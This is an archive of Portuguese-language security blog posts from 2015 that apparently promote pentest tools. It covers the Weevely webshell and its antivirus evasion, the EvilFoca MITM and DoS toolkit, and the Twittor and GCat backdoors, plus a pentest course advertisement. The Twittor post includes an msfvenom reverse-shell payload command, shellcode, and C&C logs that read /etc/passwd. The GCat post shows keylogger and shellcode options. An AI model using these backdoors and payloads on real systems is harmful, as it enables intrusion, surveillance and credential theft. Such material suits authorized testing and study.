9 de novembro de 2015

Weevely 3 - Um poderoso webshell com muitas funcionalidades

Para a galera que curte um web shell, como os antigos C99, R57 e etc, já temos uma ferramenta mais avançada e completa hoje em dia, que é o Weevely 3.

É uma das melhores ferramentas dentre as que tenho visto nos últimos tempos, e ajudará muito os pentesters que precisem prosseguir no processo de post-exploitation, escalada de privilégio, movimentação lateral e etc. Algumas de suas funcionalidades são:

  • Shell/PHP telnet-like network terminal
  • Common server misconfigurations auditing
  • SQL console pivoting on target
  • HTTP traffic proxying through target
  • Mount target file system to local mount point
  • Conduct network scans pivoting on target
  • File upload and download
  • Spawn reverse and direct TCP shells
  • Bruteforce services accounts
  • Compress and decompress zip, gzip, bzip2 and tar archives

O que é mais interessante, na minha opinião, é que seu código é polimórfico, fazendo com que dificilmente seja detectado por um antivírus ou Host IDS. Sem contar que toda a comunicação entre o agente e o cliente é totalmente obfuscada usando técnicas de steganografia em cima de protocolo HTTP.

Na WIKI dessa tool, é possível ter acesso à um help bem completo, para entender seu funcionamento e, apesar do agente ser um script em php, é provida uma API em python para construção de novos módulos de extensão. Melhor impossível!

E para baixar a tool, é só CLICAR AQUI.

Aproveitem e divirtam-se

5 de novembro de 2015

Suite FOCA

Falando de ferramentas para pentest, EvilFoca é um toolkit para quem precisa realizar testes de segurança em redes, sejam em IPv4 ou IPv6. Essa ferramenta foi desenvolvida pela ElevnPaths, mais especificamente por um de seus sócios Chema Alonso, que é um grande especialista na área de segurança da informação.

EvilFoca só precisa dos seguintes pré-requisitos para roda:

  • Windows XP ou mais atual;
  • .NET Framework 4.0 ou mais atual;
  • Biblioteca WinPCap


Com isso, você já estará pronto para instalar, rodar a ferramenta tranquilamente e executar os seguintes ataques:

  • MITM em redes IPv4 com ARP Spoofing e DHCP ACK Injection.
  • MITM em redes IPv6 com Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
  • DoS (Denial of Service) em redes IPv4 com ARP Spoofing.
  • DoS (Denial of Service) em redes IPv6 com SLAAC DoS.
  • DNS Hijacking.

Para baixar a ferramenta gratuita e saber um pouco mais sobre os ataques citados acima, você pode acessar esse link.

3 de novembro de 2015

Twittor - Backdoor usando Twitter para C&C


Olá pessoal, nesse post venho falar mais uma vez sobre um backdoor com características de Command & Control, o Twittor.

Em um dos últimos posts, falei do GCat, que usa o Gmail, mas o Twittor utiliza-se de uma outra aplicação de rede social para C&C, o Twitter (nem dá para perceber pelo seu nome...rs). O que é mais interessante é que da mesma forma que para gerenciar o GCat poderíamos usar mensgaens de email, para o Twittor usamos Direct Messages (DM) para enviar os comandos que serão executados remotamente.

Você pode baixar o aplicativo AQUI ou saber mais sobre esse programa AQUI.

Uma das coisas que achei bem interessante é a possibilidade de executar comandos remotamente, incluindo shellcodes que vc tenha gerado pelo msfvenom do Metasploit. Por exemplo, se você gerar um shellcode usando o seguinte comando:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
Basta enviar o shellcode criado com o seguinte comando, para o Twittor:

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
O número 11:22:33:44:55 é o id do seu bot client, e você poderá saber quais comandos estão disponíveis após executar o servidor através do comando:
$ python twittor.py
E digitando "help":
$ help
E é interessante também saber como enviar comando codificados, com o comando:
$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$
Para saber quais bots estão ativos, basta executar:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$
Aqui vocês podem ver uma tela de configuração do Twittor:

E uma coisa muito importante: você precisa ter uma conta no Twitter para usá-lo...rs. Apenas certifique-se de criar uma conta exclusiva para isso, sejamos inteligentes ;-)

Por hoje é só!

16 de outubro de 2015

Curso Teste de Invasão em Redes - 2016


Início em 18/01/2016

OBS: esse é o curso Pentest em Redes, que faz parte das formações completas. Qualquer pessoa pode participar do mesmo. O conteúdo do curso cobre as certificações CEH, OSCP e GPEN.

Curso de Teste de Invasão em Redes - EaD, com conteúdo completamente prático em ambiente interativo, com acesso à tela do instrutor e download de todo o material de aula (vídeos de cada aula gravada, apostila completa e logs do chat onde as dúvidas são respondidas e os comando digitados).

Os alunos, além de montarem seus laboratórios com máquinas virtuais (com S.Os. atuais), terão exemplos reais de redes e aplicações vulneráveis, encontrados na web durante a aula.

Todo o curso será baseado na distribuição KALI LINUX, com ferramentas livres e gratuitas!

O instrutor do curso possui anos de experiência em testes de invasão, tanto em redes, quanto aplicações web, redes wireless e review code. E é uma oportunidade de aprender com quem convive com as necessidades e situações reais do mercado atual, com clientes de grande porte como multinacionais de diversas áreas (Petróleo e Gás, Telecomunicações, Transportes, Operadoras de Cartão de Crédito, Bancos, Instituições Militares e Órgãos Públicos).


Alguns dos tópicos abordados no curso são:
  • Introdução à Segurança da Informação
  • Introdução ao Teste de Invasão e Ética Hacker
  • Escrita de Relatório
  • Google Hacking
  • Varreduras ativas, passivas e furtivas de rede
  • Enumeração de informações e serviços
  • Definindo vetores de ataque
  • Ignorando Proteções
  • Técnicas de Força Bruta
  • Vulnerabilidades em aplicações web
  • Elevação de Privilégios Locais
  • Testando o sistema
  • Técnicas de Sniffing
  • Ataques a Servidores WEB
  • Ataques a Redes Sem Fio
  • Introdução ao Fuzzing & Buffer Overflow Exploits
  • Metasploit Framework
  • WarGames

Quem tiver interesse no curso, por favor, acesse o link http://bit.ly/ZkbwEE e faça sua inscrição no curso "Teste de Invasão em Redes".

Carga horária: 40h
Investimento: R$ 990,00 (com possibilidade de parcelamento em até 3x no cartão de crédito via PayPal ou 12x via BCash)
Desconto: 10% de desconto para pgtos à vista via depósito.
Horário de aula: 22h às 00h
Dias de aula: segunda, e quarta-feira.
Início das aulas: 18/01/2016

15 de outubro de 2015

10 de outubro de 2015

Novos rumos e novos projetos - nascimento da HackProofing Labs

Pessoal, já há algum tempo venho maturando algumas ideias e projetos em mente, e em companhia de um grande amigo e profissional da área de Segurança da Informação.

Aos poucos, conforme o projeto onde trabalho vai se aproximando do final, essas ideias e novos projetos vão ganhando um corpo cada vez mais definido e claro. Sendo assim, vi que já era a hora de anunciar publicamente a união de dois times, a HackProofing (Luiz Vieira) e o Atrix Team (Rodrigo Matuck - http://atrixteam.blogspot.com.br/), para dar nascimento ao projeto HackProofing Labs.

Esse projeto surgiu da necessidade que nos deparamos do mercado buscar serviços de qualidade, seja de treinamento ou consultoria na área de segurança da informação, e ter dificuldade em conciliar uma boa relação entre custo e benefício.

Nosso foco será de entregar treinamentos com alto nível de qualidade e serviços de consultoria na área de segurança ofensiva e investigação com um nível de especialização ainda visto poucas vezes no Brasil.

Sendo assim, daremos um pouco mais de foco na área de pesquisa e desenvolvimento de ferramentas, e aumentaremos a contribuição para a comunidade de segurança, seja via HackProofing Labs, seja através do capítulo OWASP do RJ.

Então, preparem-se porque dentro de algumas semanas novidades surgirão e nosso site finalmente entrará no ar!

4 de outubro de 2015

GCat - Backdoor em Python

Fala Galera!

Quem é pentester, sabe que uma das fases de um teste de invasão, de acordo com a OSSTMM, é conseguir manter o acesso que foi ganho após uma exploração, para que possa fazer a movimentação lateral e a escalada de privilégio para obter mais e mais informações dentro da estrutura do alvo.

Para conseguir isso, muitas vezes é necessário prolongar o acesso para voltar mais vezes à infraestrutura comprometida, e nada melhor do que um backdoor para isso. E para esse fim, existe a ferramenta GCat, desenvolvida em Python e que usa o Gmail para "Command & Control" (o gerenciamento da backdoor).
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P 
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                          
                 d8888P  


                   .__....._             _.....__,
                     .": o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---'  

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YUR COMPUTERZ...

                        WATCHIN YUR SCREENZ

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!
Essa é a saída que temos quando executamos a ferramenta. Então aí já conseguimos ver algumas de suas funcionalidade:
- download de arquivos a partir do cliente comprometido;
- upload de arquivos para o cliente comprometido;
- execução de shellcodes personalizados (incluido aqueles que criar com o Metasploit, como o meterpreter, por exemplo);
- tirar screenshot;
- bloquear a tela e forçar o check-in;
- iniciar e parar um keylogger (em paralelo com a funcionalidade acima, fica fácil pegar a senha do usuário).

O repositório do programa contém dois arquivos:

  • gcat.py - um script que é usado para enumerar e enviar comandos para os clientes;
  • implant.py - o backdoor para fazer deployment.

Em ambos os arquivos, edite as variáveis gmail_user e gmail_pwd com o usuário e senha da conta do Gmail que criou previamente para controlar a backdoor.

É possível baixar o GCat diretamente daqui .

Divirtam-se!